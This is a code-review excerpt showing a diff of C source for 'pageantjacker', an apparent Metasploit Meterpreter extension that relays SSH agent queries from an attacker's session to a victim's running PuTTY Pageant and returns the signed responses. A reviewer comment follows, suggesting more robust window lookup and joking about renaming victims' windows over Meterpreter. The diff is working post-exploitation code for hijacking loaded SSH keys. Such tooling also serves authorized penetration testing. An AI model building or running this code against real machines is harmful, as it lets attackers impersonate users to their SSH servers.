source/extensions/pageantjacker/pageantjacker.c

```diff
@@ -0,0 +1,186 @@
+	Byte *raw_data_in;
+	PAGEANTQUERYRESULTS results = { 0 };
+
+	// Retrieve from metasploit
+	raw_data_size_in = packet_get_tlv_value_uint(packet, TLV_TYPE_EXTENSION_PAGEANTJACKER_SIZE_IN);
+	raw_data_in = packet_get_tlv_value_raw(packet, TLV_TYPE_EXTENSION_PAGEANTJACKER_BLOB_IN);
+	
+	dprintf("[PJ(request_pageant_send_query)] Size in: %d. Data is at 0x%p", raw_data_size_in, raw_data_in);
+
+	// Interact with Pageant. Note that this will always return a struct, even if the operation failed.
+	dprintf("[PJ(request_pageant_send_query)] Forwarding query to Pageant");
+	results = send_query_to_pageant(raw_data_in, raw_data_size_in);
+
+	// Build the packet based on the respones from the Pageant interaction.
+	packet_add_tlv_bool(response, TLV_TYPE_EXTENSION_PAGEANTJACKER_STATUS, results.result);
+	packet_add_tlv_raw(response, TLV_TYPE_EXTENSION_PAGEANTJACKER_RETURNEDBLOB, results.blob, results.bloblength);
+	packet_add_tlv_string(response, TLV_TYPE_EXTENSION_PAGEANTJACKER_ERRORMESSAGE, results.error_message);	
+	dprintf("[PJ(request_pageant_send_query)] Success: %d. Return data len %d, data is at 0x%p. Error message at 0x%p (%s)", results.result, results.bloblength, results.blob, &results.error_message, results.error_message);
+
+	// Free the allocated memory once we are done
+	if (results.blob) {
+		free(results.blob);
+		dprintf("[PJ(request_pageant_send_query)] Freed results blob");
+	}
+
+	// Transmit the packet to metasploit
+	packet_transmit_response(ERROR_SUCCESS, remote, response);
+
+	return ERROR_SUCCESS;
+}
+
+
+/*!
+ * @brief Initialize the server extension
+ */
+DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
+{
+	hMetSrv = remote->met_srv;
+
+	command_register_all(customCommands);
+
+	return ERROR_SUCCESS;
+}
+
+/*!
+ * @brief Deinitialize the server extension
+ */
+DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
+{
+	command_deregister_all(customCommands);
+
+	return ERROR_SUCCESS;
+}
+
+/*!
+* @brief Get the name of the extension.
+* @param buffer Pointer to the buffer to write the name to.
+* @param bufferSize Size of the \c buffer parameter.
+* @return Indication of success or failure.
+*/
+DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
+{
+	strncpy_s(buffer, bufferSize, "pageantjacker", bufferSize - 1);
+	return ERROR_SUCCESS;
+}
+
+PAGEANTQUERYRESULTS send_query_to_pageant(byte *query, unsigned int querylength) {
+
+	char strPuttyRequest[23]; // This will always be 23 chars
+	COPYDATASTRUCT pageant_copy_data;
+	unsigned char *filemap_pointer;
+	HANDLE filemap;
+	PAGEANTQUERYRESULTS ret;
+	HWND hPageant;
+	unsigned int protocol_return_length;
+	unsigned int api_result;
+	void *memcpy_result;
+
+	// Initialise the results arrays
+	memset((void *) &ret, 0, sizeof(ret));
+	memset((void *) &strPuttyRequest, 0, sizeof(strPuttyRequest));
+	ret.result = FALSE;
+	ret.error_message = PAGEANTJACKER_ERROR_NOERROR;
+
+	if (hPageant = FindWindowW(PAGEANT_NAME, PAGEANT_NAME)) {

```

Comment:
It's possible for any program, with permission, to change the name of a window. You can do it with railgun straight over meterpreter (I've trolled people by renaming all windows to "HAX!" for example :P).

So the reason I was suggesting this was to make sure that ~~trolling~~changes like this would not cause your module to break. The Window class name won't change, but the top level window name _might_ change, especially across versions.

It's probably not that big a deal, but as I said it's a super picky future proofing thing :)